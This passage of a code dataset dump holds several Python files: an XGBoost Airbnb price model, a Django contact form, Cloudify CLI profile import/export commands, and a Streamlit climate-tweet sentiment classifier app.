all_data['zipcode'].fillna('UKN')\nencoder = LabelEncoder()\nencoder.fit(all_data['zipcode']) \nall_data['zipcode'] = encoder.transform(all_data['zipcode'])\n\n# name \nall_data['name'] = all_data['name'].fillna('')\nfeatureVec = np.zeros((len(all_data),300),dtype=\"float32\")\nwarn_w2v = 0 \nfor i in range(len(all_data)):\n words = review_to_sentences(all_data.iloc[i]['name'], tokenizer=tokenizer, stops=stops, remove_stopwords=True)\n featureVec_i = np.zeros((300),dtype=\"float32\")\n #\n nwords = 0.\n # \n #\n # Loop over each word in the review and, if it is in the model's\n # vocaublary, add its feature vector to the total\n for word in words:\n if word in embeddings_index.keys(): \n nwords = nwords + 1.\n featureVec_i = np.add(featureVec_i,embeddings_index[word])\n # \n # Divide the result by the number of words to get the average\n if nwords > 0: \n featureVec_i = np.divide(featureVec_i,nwords)\n else:\n #print(\">>> WARNING <<< No words in vocaublary\")\n warn_w2v = warn_w2v + 1 \n #print(str(words))\n featureVec[i] = featureVec_i\n\nprint(\" >> No words in vocaublary for \",warn_w2v,\"cases\")\n\npca = PCA().fit(featureVec)\nw2v_name_pca_transf = pca.transform(featureVec)\nall_data['w2v_name_pca0'] = w2v_name_pca_transf[:, 0]\nall_data['w2v_name_pca1'] = w2v_name_pca_transf[:, 1]\nall_data['w2v_name_pca2'] = w2v_name_pca_transf[:, 2]\nall_data['w2v_name_pca3'] = w2v_name_pca_transf[:, 3]\nall_data['w2v_name_pca4'] = w2v_name_pca_transf[:, 4]\nall_data['w2v_name_pca5'] = w2v_name_pca_transf[:, 5]\nall_data['w2v_name_pca6'] = w2v_name_pca_transf[:, 6]\nall_data['w2v_name_pca7'] = w2v_name_pca_transf[:, 7]\nall_data['w2v_name_pca8'] = w2v_name_pca_transf[:, 8]\nall_data['w2v_name_pca9'] = w2v_name_pca_transf[:, 9]\nall_data['w2v_name_pca10'] = w2v_name_pca_transf[:, 10]\nall_data['w2v_name_pca11'] = w2v_name_pca_transf[:, 11]\nall_data['w2v_name_pca12'] = w2v_name_pca_transf[:, 
\n\nall_data = all_data.drop(['name','thumbnail_url',],axis=1)\n\n\n# 13. bedrooms, beds , bed_type \nall_data.bedrooms = all_data.bedrooms.fillna(0)\nall_data.beds = all_data.beds.fillna(0)\n\n## cut\n# all_data = all_data.drop(['well-lit_path_to_entrance','smartlock','garden_or_backyard','window_guards','high_chair','hot_water_kettle','pocket_wifi','babysitter_recommendations',\n# 'private_bathroom','accessible-height_bed','flat','waterfront','baby_bath','free_parking_on_street','wide_entryway','beach_essentials','accessible-height_toilet','handheld_shower_head','other_pet(s)',\n# 'wide_hallway_clearance','smooth_pathway_to_front_door','wide_clearance_to_bed','changing_table','baby_monitor','other','wide_clearance_to_shower_&_toilet','table_corner_guards','air_purifier',\n# 'bath_towel','bathtub_with_shower_chair','beachfront','body_soap','disabled_parking_spot','ev_charger','firm_matress','firm_mattress','fixed_grab_bars_for_shower_&_toilet','flat_smooth_pathway_to_front_door',\n# 'grab-rails_for_shower_and_toilet','ground_floor_access','hand_or_paper_towel','hand_soap','lake_access','paid_parking_off_premises','path_to_entrance_lit_at_night','roll-in_shower_with_chair',\n# 'ski_in/ski_out','toilet_paper','washer_/_dryer','wide_clearance_to_shower_and_toilet'],axis=1)\n\n## remove the sequence id \nall_data = all_data.drop(['id'],axis=1)\n\nassert np.sum(all_data.isnull()).sum() == 0 \n\n################## \nprint('--------------> Modeling ... ')\nXtr, Xv, ytr, yv = train_test_split(all_data[:train_obs].values, y_train, test_size=0.1, random_state=1973)\ndtrain = xgb.DMatrix(Xtr, label=ytr)\ndvalid = xgb.DMatrix(Xv, label=yv)\ndtest = xgb.DMatrix(all_data[train_obs:].values)\nwatchlist = [(dtrain, 'train'), (dvalid, 'valid')]\n\n#Try different parameters! My favorite is random search :)\nxgb_pars = {'min_child_weight': 50,\n            'eta': 0.005,\n            'colsample_bytree': 0.3,\n            'max_depth': 10, \n            'subsample': 0.8,\n            'lambda': 0.5,\n            'nthread': -1,\n            'booster' : 'gbtree',\n            'silent': 1,\n            'eval_metric': 'rmse',\n            'objective': 'reg:linear'}\n\nmodel = xgb.train(xgb_pars, dtrain, 10000, watchlist, early_stopping_rounds=50,maximize=False, verbose_eval=10)\n\nprint('Modeling RMSE %.5f' % model.best_score)\n\nprint('--------------> Submission ... ')\ntest['log_price'] = model.predict(dtest)\nsubfn = \"base6_eta0005__val_\"+str(model.best_score)+\"__rnd_\"+str(model.best_iteration)+\".csv\"\ntest[['id', 'log_price']].to_csv(subfn, index=False)\n\nprint('--------------> Retrain all data + Feature importance ... ')\ndtrain = xgb.DMatrix(all_data[:train_obs].values, label=y_train)\ndtest = xgb.DMatrix(all_data[train_obs:].values)\nmodel = xgb.train(xgb_pars, dtrain, model.best_iteration+5, maximize=False, verbose_eval=10)\nprint('-----> Submission ... ')\ntest['log_price'] = model.predict(dtest)\nsubfn = \"base60005__all_data__rnd_\"+str(model.best_iteration)+\".csv\"\ntest[['id', 'log_price']].to_csv(subfn, index=False)
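\n# Aside: the \"random search\" hinted at in the comment above can be sketched in a few\n# lines. Hedged, self-contained toy example on synthetic data (X_demo, y_demo, d_demo,\n# search_space and best_demo are hypothetical names; the real DMatrix objects are untouched):\nimport random\nrng = np.random.RandomState(0)\nX_demo, y_demo = rng.rand(200, 5), rng.rand(200)\nd_demo = xgb.DMatrix(X_demo, label=y_demo)\nsearch_space = {'max_depth': [4, 6, 8, 10], 'eta': [0.3, 0.1, 0.05], 'subsample': [0.6, 0.8, 1.0]}\nbest_demo = None\nfor _ in range(5):\n    pars = {k: random.choice(v) for k, v in search_space.items()}\n    pars.update({'objective': 'reg:linear', 'silent': 1, 'eval_metric': 'rmse'})\n    cv_res = xgb.cv(pars, d_demo, num_boost_round=20, nfold=3, seed=0)\n    score = cv_res['test-rmse-mean'].iloc[-1]\n    if best_demo is None or score < best_demo[0]:\n        best_demo = (score, pars)\nprint('best toy params:', best_demo)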
\n\nprint('-----> Feature importance ... ')\nfeature_names = all_data.columns\nfeature_importance_dict = model.get_fscore()\nfs = ['f%i' % i for i in range(len(feature_names))]\nf1 = pd.DataFrame({'f': list(feature_importance_dict.keys()), 'importance': list(feature_importance_dict.values())})\nf2 = pd.DataFrame({'f': fs, 'feature_name': feature_names})\nfeature_importance = pd.merge(f1, f2, how='right', on='f')\nfeature_importance = feature_importance.fillna(0)\n# sort_values returns a new frame: keep the result, then print the frame itself\nfeature_importance = feature_importance.sort_values(by='importance', ascending=False)\nprint(feature_importance)\nsubfn = \"error__feat_importance_base6eta0005.csv\" \nfeature_importance.to_csv(subfn, index=False) \n\n\n\n\n\n","sub_path":"competitions/deloitte/base6.py","file_name":"base6.py","file_ext":"py","file_size_in_byte":18702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"63698225","text":"from django import forms\nfrom contacto.models import Contacto\n\n\nclass ContactoForm(forms.ModelForm):\n    class Meta:\n        model = Contacto\n        fields = ['nombre', 'email', 'asunto', 'mensaje']\n        # NOTE: 'required' is not a standard ModelForm Meta option; Django ignores it\n        required = ['nombre', 'email', 'mensaje']\n        labels = {\n            'nombre': 'Nombre completo:',\n            'email': 'Email:',\n            'asunto': 'Asunto:',\n            'mensaje': 'Mensaje:'\n        }\n        widgets = {\n            'nombre': forms.TextInput(\n                attrs = {\n                    'class':'form-control',\n                    'placeholder':'Ingrese su Apellido y Nombre/s',\n                    'id':'nombre'\n                }\n            ),\n            'email': forms.EmailInput(\n                attrs = {\n                    'class':'form-control',\n                    'placeholder':'example@email.com',\n                    'id':'email'\n                }\n            ),\n            'asunto': forms.TextInput(\n                attrs = {\n                    'class':'form-control',\n                    'placeholder':'Ingrese el asunto de su mensaje',\n                    'id':'asunto'\n                }\n            ),\n            'mensaje': forms.Textarea(\n                attrs = {\n                    'class':'form-control',\n                    'placeholder':'Ingrese el mensaje',\n                    'id':'mensaje'\n                }\n            )\n        }\n    \n\n","sub_path":"contacto/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"252419303","text":"########\n# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#        http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n############\n\nimport os\nimport shutil\nimport tarfile\nfrom contextlib import closing\n\nfrom .. import env\nfrom .. import table\nfrom .. 
import utils\nfrom ..cli import cfy\nfrom ..cli import helptexts\nfrom ..exceptions import CloudifyCliError\n\nEXPORTED_KEYS_DIRNAME = '.exported-ssh-keys'\nEXPORTED_SSH_KEYS_DIR = os.path.join(env.PROFILES_DIR, EXPORTED_KEYS_DIRNAME)\n\n\n@cfy.group(name='profiles')\n@cfy.options.verbose()\ndef profiles():\n \"\"\"Handle Cloudify CLI profiles\n\n Each profile can manage a single Cloudify manager.\n\n A profile is automatically created when using the `cfy use`,\n and `cfy bootstrap` commands.\n\n Profiles are named according to the IP of the manager they manage.\n \"\"\"\n if not env.is_initialized():\n env.raise_uninitialized()\n\n\n@profiles.command(name='get-active',\n short_help='Retrieve profile information')\n@cfy.options.verbose()\n@cfy.pass_logger\ndef get(logger):\n \"\"\"Gets your current active profile\n \"\"\"\n active_profile_name = env.get_active_profile()\n if active_profile_name == 'local':\n logger.info(\"You're currently working in local mode. \"\n \"To use a manager run `cfy use MANAGER_IP`\"\n \" or bootstrap one\")\n return\n\n active_profile = _get_profile(env.get_active_profile())\n _print_profiles([active_profile], 'Active profile:')\n\n\n@profiles.command(name='list',\n short_help='List profiles')\n@cfy.options.verbose()\n@cfy.pass_logger\ndef list(logger):\n \"\"\"List all profiles\n \"\"\"\n current_profile = env.get_active_profile()\n\n profiles = []\n profile_names = _get_profile_names()\n for profile in profile_names:\n profile_data = _get_profile(profile)\n if profile == current_profile:\n # Show the currently active profile by appending *\n profile_data['manager_ip'] = '*' + profile_data['manager_ip']\n profiles.append(profile_data)\n\n if profiles:\n logger.info('Listing all profiles...')\n _print_profiles(profiles, 'Profiles:')\n\n if not profile_names:\n logger.info(\n 'No profiles found. 
You can create a new profile '\n 'by bootstrapping a manager via `cfy bootstrap` or using an '\n 'existing manager via the `cfy use` command')\n\n\n@profiles.command(name='purge-incomplete',\n short_help='Purge profiles in incomplete bootstrap state')\n@cfy.options.verbose()\n@cfy.pass_logger\ndef purge_incomplete(logger):\n \"\"\"Purge all profiles for which the bootstrap state is incomplete\n \"\"\"\n logger.info('Purging incomplete bootstrap profiles...')\n profile_names = _get_profile_names()\n for profile in profile_names:\n context = env.get_profile_context(profile)\n if context.bootstrap_state == 'Incomplete':\n logger.debug('Deleteing profiles {0}...'.format(profile))\n env.delete_profile(profile)\n logger.info('Purge complete')\n\n\n@profiles.command(name='delete',\n short_help='Delete a profile')\n@cfy.argument('profile-name')\n@cfy.options.verbose()\n@cfy.pass_logger\ndef delete(profile_name, logger):\n \"\"\"Delete a profile\n\n `PROFILE_NAME` is the IP of the manager the profile manages.\n \"\"\"\n logger.info('Deleting profile {0}...'.format(profile_name))\n try:\n env.delete_profile(profile_name)\n logger.info('Profile deleted')\n except CloudifyCliError as ex:\n logger.info(str(ex))\n\n\n@profiles.command(name='export',\n short_help='Export all profiles to an archive')\n@cfy.options.include_keys(helptexts.EXPORT_SSH_KEYS)\n@cfy.options.optional_output_path\n@cfy.options.verbose()\n@cfy.pass_logger\ndef export_profiles(include_keys, output_path, logger):\n \"\"\"Export all profiles to a file\n\n WARNING: Including the ssh keys of your profiles in the archive means\n that once the profiles are imported, the ssh keys will be put back\n in their original locations!\n\n If `-o / --output-path` is omitted, the archive's name will be\n `cfy-profiles.tar.gz`.\n \"\"\"\n _assert_profiles_exist()\n\n destination = output_path or \\\n os.path.join(os.getcwd(), 'cfy-profiles.tar.gz')\n\n # TODO: Copy exported ssh keys to each profile's directory\n logger.info('Exporting profiles to {0}...'.format(destination))\n if include_keys:\n for profile in _get_profile_names():\n _backup_ssh_key(profile)\n utils.tar(env.PROFILES_DIR, destination)\n if include_keys:\n shutil.rmtree(EXPORTED_SSH_KEYS_DIR)\n logger.info('Export complete!')\n logger.info(\n 'You can import the profiles by running '\n '`cfy profiles import PROFILES_ARCHIVE`')\n\n\n@profiles.command(name='import',\n short_help='Import profiles from an archive')\n@cfy.argument('archive-path')\n@cfy.options.include_keys(helptexts.IMPORT_SSH_KEYS)\n@cfy.options.verbose()\n@cfy.pass_logger\ndef import_profiles(archive_path, include_keys, logger):\n \"\"\"Import profiles from a profiles archive\n\n WARNING: If a profile exists both in the archive and locally\n it will be overwritten (any other profiles will be left intact).\n\n `ARCHIVE_PATH` is the path to the profiles archive to import.\n \"\"\"\n _assert_is_tarfile(archive_path)\n _assert_profiles_archive(archive_path)\n\n logger.info('Importing profiles from {0}...'.format(archive_path))\n utils.untar(archive_path, os.path.dirname(env.PROFILES_DIR))\n\n if include_keys:\n for profile in _get_profile_names():\n _restore_ssh_key(profile)\n else:\n if EXPORTED_KEYS_DIRNAME in os.listdir(env.PROFILES_DIR):\n logger.info(\"The profiles archive you provided contains ssh keys \"\n \"for one or more profiles. 
To restore those keys to \"\n \"their original locations, you can use the \"\n \"`--include-keys flag or copy them manually from {0} \"\n .format(EXPORTED_SSH_KEYS_DIR))\n logger.info('Import complete!')\n logger.info('You can list profiles using `cfy profiles list`')\n\n\ndef _assert_profiles_exist():\n if not _get_profile_names():\n raise CloudifyCliError('No profiles to export')\n\n\ndef _assert_profiles_archive(archive_path):\n with closing(tarfile.open(name=archive_path)) as tar:\n if not tar.getmembers()[0].name == 'profiles':\n raise CloudifyCliError(\n 'The archive provided does not seem to be a valid '\n 'Cloudify profiles archive')\n\n\ndef _assert_is_tarfile(archive_path):\n if not tarfile.is_tarfile(archive_path):\n raise CloudifyCliError('The archive provided must be a tar.gz archive')\n\n\ndef _get_profile_names():\n # TODO: This is too.. ambiguous. We should change it so there are\n # no exclusions.\n excluded = ['local', EXPORTED_KEYS_DIRNAME]\n profile_names = [item for item in os.listdir(env.PROFILES_DIR)\n if item not in excluded]\n\n return profile_names\n\n\ndef _backup_ssh_key(profile):\n return _move_ssh_key(profile, is_backup=True)\n\n\ndef _restore_ssh_key(profile):\n return _move_ssh_key(profile, is_backup=False)\n\n\n@cfy.pass_logger\ndef _move_ssh_key(profile, logger, is_backup):\n \"\"\"Iterate through all profiles and move their ssh keys\n\n This is how we backup and restore ssh keys.\n \"\"\"\n context = env.get_profile_context(profile)\n key_filepath = context.ssh_key\n if key_filepath:\n backup_path = os.path.join(\n EXPORTED_SSH_KEYS_DIR, os.path.basename(key_filepath)) + \\\n '.{0}.profile'.format(profile)\n if is_backup:\n if not os.path.isdir(EXPORTED_SSH_KEYS_DIR):\n os.makedirs(EXPORTED_SSH_KEYS_DIR)\n logger.info('Copying ssh key {0} to {1}...'.format(\n key_filepath, backup_path))\n shutil.copy2(key_filepath, backup_path)\n else:\n if os.path.isfile(backup_path):\n logger.info(\n 'Restoring ssh key for profile {0} to {1}...'.format(\n profile, key_filepath))\n shutil.move(backup_path, key_filepath)\n\n\ndef _get_profile(profile_name):\n current_profile = env.get_active_profile()\n env.set_active_profile(profile_name)\n context = env.get_profile_context(profile_name)\n env.set_active_profile(current_profile)\n\n return context.to_dict()\n\n\ndef _print_profiles(profiles, header):\n columns = [\n 'manager_ip',\n 'ssh_user',\n 'ssh_key_path',\n 'ssh_port',\n 'rest_port',\n 'rest_protocol',\n 'manager_username',\n 'bootstrap_state'\n ]\n pt = table.generate(columns, data=profiles)\n table.log(header, pt)\n","sub_path":"cloudify_cli/commands/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"431281411","text":"\"\"\"\n\n Simple Streamlit webserver application for serving developed classification\n models.\n\n models.\n Author: Explore Data Science Academy.\n\n Note:\n ---------------------------------------------------------------------\n Plase follow the instructions provided within the README.md file\n located within this directory for guidance on how to use this script\n correctly.\n ---------------------------------------------------------------------\n\n Description: This file is used to launch a minimal streamlit web\n application. 
You are expected to extend the functionality of this script\n as part of your predict project.\n\n For further help with the Streamlit framework, see:\n\n https://docs.streamlit.io/en/latest/\n\n application. You are expected to extend the functionality of this script\n as part of your predict project.\n For further help with the Streamlit framework, see:\n https://docs.streamlit.io/en/latest/\n\"\"\"\n# Streamlit dependencies\nimport streamlit as st\nimport joblib\nimport os\nimport pickle\nfrom markdown import markdown\n\n# Data dependencies\nimport pandas as pd\nimport numpy as np\n\n# Text processing\nimport spacy\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import TweetTokenizer, word_tokenize\nimport string\nimport re\n\n# Data processing\nfrom sklearn.utils import resample\nfrom sklearn.feature_extraction import text\nfrom sklearn.model_selection import train_test_split\n\n# Visual dependencies\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom wordcloud import WordCloud\nfrom bs4 import BeautifulSoup\nfrom PIL import Image\nimport plotly.graph_objects as go\n\n\nmatplotlib.use(\"Agg\")\nplt.style.use('ggplot')\n\n# Create a spaCy tokenizer\nspacy.load('en')\nlemmatizer = spacy.lang.en.English()\n\n\ndef tokenize(text):\n tokens = lemmatizer(text)\n return [token.lemma_ for token in tokens]\n\n# Load necessary data\nfile = open(\"resources/mod_and_vect.pkl\", \"rb\")\nTF_1 = pickle.load(file)\nTF_2 = pickle.load(file)\nCV_2 = pickle.load(file)\nNL_SVM_TF1 = pickle.load(file)\nLR_TF2 = pickle.load(file)\nLSVM = pickle.load(file)\nLRCV = pickle.load(file)\nfile.close()\n\n# Load your raw data\nread_and_cache_csv = st.cache(pd.read_csv, allow_output_mutation=True)\nraw = read_and_cache_csv(\"resources/kaggle_train.csv\")\n\n\ndef get_key(val, my_dict):\n for key, value in my_dict.items():\n if val == value:\n return key\n\n\n# define custom functions to be used\n@st.cache\ndef clean_text(text):\n text = str(text).lower()\n text = re.sub('\\[.*?\\]', '', text)\n text = re.sub('https?://\\S+|www\\.\\S+', 'URL', text)\n text = re.sub('<.*?>+', '', text)\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text)\n text = re.sub('\\n', '', text)\n text = re.sub('\\w*\\d\\w*', '', text)\n return text\n\n\n@st.cache(persist=True)\ndef prep_eda_df(df):\n\n # preprocess eda data\n # Tweet length by word count, character count, and punctuation count\n eda_data = raw.copy()\n # Extract URL's\n pattern_url = r'(http[s]?://(?:[A-Za-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9A-Fa-f][0-9A-Fa-f]))+)'\n eda_data['Url'] = eda_data['message'].str.extract(pattern_url)\n # Replace URL with string 'web-url'\n eda_data['message'] = eda_data['message'].replace(pattern_url, 'web-url', regex=True)\n\n # Clean text with clean_text() function\n eda_data['clean_tweet'] = eda_data['message'].apply(lambda x: clean_text(x))\n\n # Tokenize tweets with nltk\n # tokeniser = word_tokenize()\n eda_data['tokens'] = eda_data['message'].apply(word_tokenize)\n eda_data['tweet_length'] = eda_data['tokens'].str.len()\n\n # Tweet Character count column\n eda_data['character_count'] = eda_data['message'].apply(lambda c: len(c))\n # repeat for punctuation\n eda_data['punctuation_count'] = eda_data['message'].apply(lambda x: len([i for i in str(x) if i in string.punctuation]))\n eda_df = eda_data.copy()\n return eda_df\n\neda_data = prep_eda_df(raw)\n\nsent_dict = {-1: 'Anti', 0: 'Neutral', 1: 'Pro', 2: 'News'}\n\n\ndef sent_kde_plots(df, values, target):\n fig, ax = 
\n\n\ndef sent_kde_plots(df, values, target):\n    fig, ax = plt.subplots()\n    col = list(df[target].unique())\n\n    for c in col:\n        sns.kdeplot(df[values][df[target] == c], shade=True, label=sent_dict.get(c))\n\n    plt.xlabel(values)\n    plt.ylabel('Density')\n    plt.title('Distribution of Tweet {}'.format(values))\n    return\n\n\ndef wordcloud_gen(df, target, values):\n    sent = list(df[target].unique())\n    dft = df.groupby(target)[values].apply(' '.join)  # group the frame passed in, not an undefined global\n    for s in sent:\n        text = dft[s]\n        wordcloud = WordCloud(background_color='white', max_words=100,\n                              max_font_size=50).generate(text)\n        plt.figure()\n        plt.imshow(wordcloud, interpolation='bilinear')\n        plt.title('Tweets under {} Class'.format(s))\n        plt.axis('off')\n    return\n\n\n# label the sentiments\ndef sentiment_label(df_):\n    if df_['sentiment'] == 2:\n        return \"News\"\n    elif df_['sentiment'] == 1:\n        return \"Pro\"\n    elif df_['sentiment'] == 0:\n        return \"Neutral\"\n    elif df_['sentiment'] == -1:\n        return \"Anti\"\n\nraw[\"label\"] = raw.apply(sentiment_label, axis=1)\n\n\n# The main function where we will build the actual app\ndef main():\n    \"\"\"Tweet Classifier App with Streamlit \"\"\"\n\n    # Creates a main title and subheader on your page -\n    # these are static across all pages\n\n    st.title(\"Tweet Classifier\")\n    st.subheader(\"Climate change tweet classification\")\n\n    # Creating sidebar\n    # you can create multiple pages this way\n    st.sidebar.title(\"Pages\")\n    selection = st.sidebar.radio(label=\"\", options=[\"Information\", \"EDA and Insights\", \"Prediction\", \"Technical\"])\n\n    # Building out the \"Information\" page\n    if selection == \"Information\":\n        st.info(\"Over time, consumers have become more conscious about acquiring products/services from brands that uphold certain values and ideals. They also consider the service provider's stances towards issues such as climate change. In order to appeal to these consumers, organisations should understand their sentiments. They need to understand how their products will be received whilst trying to decrease their environmental impact or carbon footprint. 
This can be achieved using Machine Learning.\")\n\n # You can read a markdown file from supporting resources folder\n if st.button(\"What is Machine Learning\"):\n what_ml = (open('resources/what_is_ML.md').read())\n st.markdown(what_ml, unsafe_allow_html=True)\n\n ml_image = Image.open(\"resources/imgs/ml_pic.jpg\")\n st.image(ml_image, use_column_width=True)\n\n # to add info on machine learning here\n if st.button(\"How does the app work\"):\n app_info = markdown(open(\"resources/info.md\").read())\n st.markdown(app_info, unsafe_allow_html=True)\n\n st.subheader(\"Description of Sentiment Classes\")\n descrip_image = Image.open(\"resources/imgs/climate_data_sentiment_description.png\")\n st.image(descrip_image, use_column_width=True)\n\n st.subheader(\"Raw Twitter data and label\")\n if st.checkbox('Show raw data'): # data is hidden if box is unchecked\n st.write(raw) # will write the df to the page\n\n # Building out the predication page\n if selection == \"Prediction\":\n st.info(\"Climate Change belief with ML Models utilising NLP\")\n st.subheader(\"What is NLP\")\n\n what_nlp = markdown(open(\"resources/what_is_nlp.md\").read())\n st.markdown(what_nlp, unsafe_allow_html=True)\n raw = pd.read_csv(\"resources/train.csv\")\n\n nlp_img = Image.open('resources/imgs/nlp_pipeline_img.png')\n st.image(nlp_img, use_column_width=True)\n\n # Detect and remove duplicate rows\n raw = raw.drop_duplicates(subset=['message'])\n\n # Remove blanks\n def remove_blanks(df):\n blanks = []\n for index, tweet in enumerate(df['message']):\n if type(tweet) == str:\n if tweet in ['', ' ']:\n blanks.append(index)\n return df.drop(blanks)\n raw = remove_blanks(raw)\n\n # Remove special characters\n def clean_text(text):\n text = str(text).lower()\n text = re.sub('\\[.*?\\]', '', text)\n text = re.sub('https?://\\S+|www\\.\\S+', 'URL', text)\n text = re.sub('<.*?>+', '', text)\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text)\n text = re.sub('\\n', '', text)\n text = re.sub('\\w*\\d\\w*', '', text)\n return text\n raw['clean_tweet'] = raw['message'].apply(lambda x: clean_text(x))\n\n # Remove stop-words\n stop_words = stopwords.words('english') # Assign stop_words list\n\n def remove_stopword(text):\n return [word for word in text.split() if word not in stop_words]\n raw['clean_tweet'] = raw['clean_tweet'].apply(lambda x: remove_stopword(x))\n\n # Join text\n def join_text(text):\n text = ' '.join(text)\n return text\n raw['clean_tweet'] = raw['clean_tweet'].apply(lambda x: join_text(x))\n\n # Assign feature and response variables\n X = raw['clean_tweet']\n y = raw['sentiment']\n\n # Addressing imbalance\n heights = [len(y[y == label]) for label in [0, 1, 2, -1]]\n bars = pd.DataFrame(zip(heights, [0, 1, 2, -1]), columns=['heights', 'labels'])\n bars = bars.sort_values(by='heights',ascending=True)\n\n # Let's pick a class size of roughly half the size of the largest size\n class_size = 3500\n bar_label_df = bars.set_index('labels')\n resampled_classes = []\n\n for label in [0, 1, 2, -1]:\n # Get number of observations from this class\n label_size = bar_label_df.loc[label]['heights']\n\n # If label_size < class size the upsample, else downsample\n if label_size < class_size:\n # Upsample\n label_data = raw[['clean_tweet', 'sentiment']][raw['sentiment'] == label]\n label_resampled = resample(label_data,\n # sample with replacement\n # (we need to duplicate observations)\n replace=True,\n # number of desired samples\n n_samples=class_size,\n random_state=27)\n else:\n # Downsample\n label_data = 
raw[['clean_tweet', 'sentiment']][raw['sentiment'] == label]\n                label_resampled = resample(label_data,\n                                           # sample without replacement\n                                           # (no need for duplicate observations)\n                                           replace=False,\n                                           # number of desired samples\n                                           n_samples=class_size,\n                                           random_state=27)\n\n            resampled_classes.append(label_resampled)\n\n        # Assign feature and response variables from resampled data\n        resampled_data = np.concatenate(resampled_classes, axis=0)\n\n        X_resampled = resampled_data[:, :-1]\n        y_resampled = resampled_data[:, -1]\n\n        df_resampled = pd.DataFrame(X_resampled.reshape(-1, 1))\n        df_resampled.columns = ['tweet']\n        df_resampled['sentiment'] = y_resampled\n        df_resampled['sentiment'] = df_resampled['sentiment'].astype('int')\n\n        # Splitting data\n        X_train, X_test, y_train, y_test = train_test_split(df_resampled['tweet'].values,\n                                                            df_resampled['sentiment'].values,\n                                                            test_size=0.1, random_state=42)\n\n        # Create a spaCy tokenizer\n        spacy.load('en')\n        lemmatizer = spacy.lang.en.English()\n\n        def tokenize(text):\n            tokens = lemmatizer(text)\n            return [token.lemma_ for token in tokens]\n\n        # Creating a text box for user input\n        tweet_text = st.text_area(\"Enter Text\", \"Type Here\")\n\n        models_dict = {'Linear Support Vector Classifier': LSVM,\n                       'Non-Linear Support Vector Classifier': NL_SVM_TF1,\n                       'Logistic Regression CV': LRCV,\n                       'Logistic Regression TFiDF': LR_TF2}\n\n        choice = st.selectbox(\"Please choose a Classification Model\",\n                              list(models_dict.keys()))\n        model = models_dict.get(choice)\n\n        mod_vect_dict = {LSVM: CV_2, NL_SVM_TF1: TF_1, LRCV: CV_2, LR_TF2: TF_2}\n\n        if st.button(\"Classify\"):\n            # Transforming user input with vectorizer\n            vect = mod_vect_dict.get(model)\n            vect_text = vect.transform([tweet_text]).toarray()\n            predictor = model\n            prediction = predictor.predict(vect_text)\n\n            # When model has successfully run, will print prediction\n            # You can use a dictionary or similar structure to make this output\n            # more human interpretable.\n            pred_labels = {\"Anti Climate Change\": -1,\n                           \"Neutral toward Climate Change\": 0,\n                           \"Pro Climate Change\": 1,\n                           \"News about Climate Change\": 2}\n\n            result = get_key(prediction, pred_labels)\n            st.success(\"Text Categorized as: {}\".format(result))\n\n    # Building EDA and Insights page\n    # eda = st.sidebar.select()\n    if selection == \"EDA and Insights\":\n        st.info('This page is dedicated to Exploratory Data Analysis and insights gained from it.')\n\n        # load data\n        raw = read_and_cache_csv(\"resources/kaggle_train.csv\")\n\n        # Adding to sidebar\n        st.sidebar.title(\"EDA and Insights\")\n        st.sidebar.info('Use the multiselect box below to view graphs by sentiment; the insight text applies when all sentiments are selected.')\n        sentiment = raw[\"label\"].unique().tolist()\n        select_sent = st.sidebar.multiselect('View Analysis by sentiment', sentiment, default=sentiment)\n\n        st.markdown('### **Exploratory Data Analysis**')\n        st.markdown('When conducting Exploratory Data Analysis, we try to look at the data from all angles, inspecting and visualising it to extract any insights that we can. This can sometimes give surprising results, and as such we try to explore any possible connections, as well as outliers, or any group/class/type that differs from the rest. In this app we will be exploring the distributions of our data from different aspects, combined with what makes it unique, or where the data is strengthened by similarities.
    In doing so we summarize the main characters of the data and gain insight on what the data can tell us. In this regard get more understanding about what it represents and how to apply it.', unsafe_allow_html=True)\n if st.checkbox(\"Preview DataFrame\"):\n if st.button(\"Tail\"):\n st.write(raw.tail())\n else:\n st.write(raw.head())\n\n # Add image description of sentiment\n st.subheader(\"Description of Sentiment Classes\")\n descrip_image = Image.open(\"resources/imgs/climate_data_sentiment_description.png\")\n st.image(descrip_image, use_column_width=True)\n\n # mask to filter dataframe\n mask_sentiment = raw['label'].isin(select_sent)\n data = raw[mask_sentiment]\n\n st.markdown('### Data Distribution ###')\n\n # Sentiment Distribution\n fig, ax = plt.subplots(figsize=(10, 5))\n # graph = sns.countplot(x = 'sentiment', data = raw)\n graph = sns.countplot(x='label', data=data)\n plt.title('Distribution of Sentiment classes count')\n st.pyplot()\n\n # Insight\n st.markdown('More than half of the tweets , precisely 50,76%, belong to class 1. This indicates that the majority of tweets collected support the belief that man-made climate change exists. Conversely, 8.58% of the tweets collected are class -1, which represents tweets that do not believe in man-made climate change. Tweets that link to factual news about climate change comprise 24,89% whilst tweets which are neutral (neither supports nor refutes the belief of man-made climate change) make up 15,77% of the dataset. These are represented by the classes 2 and 0 respectively.
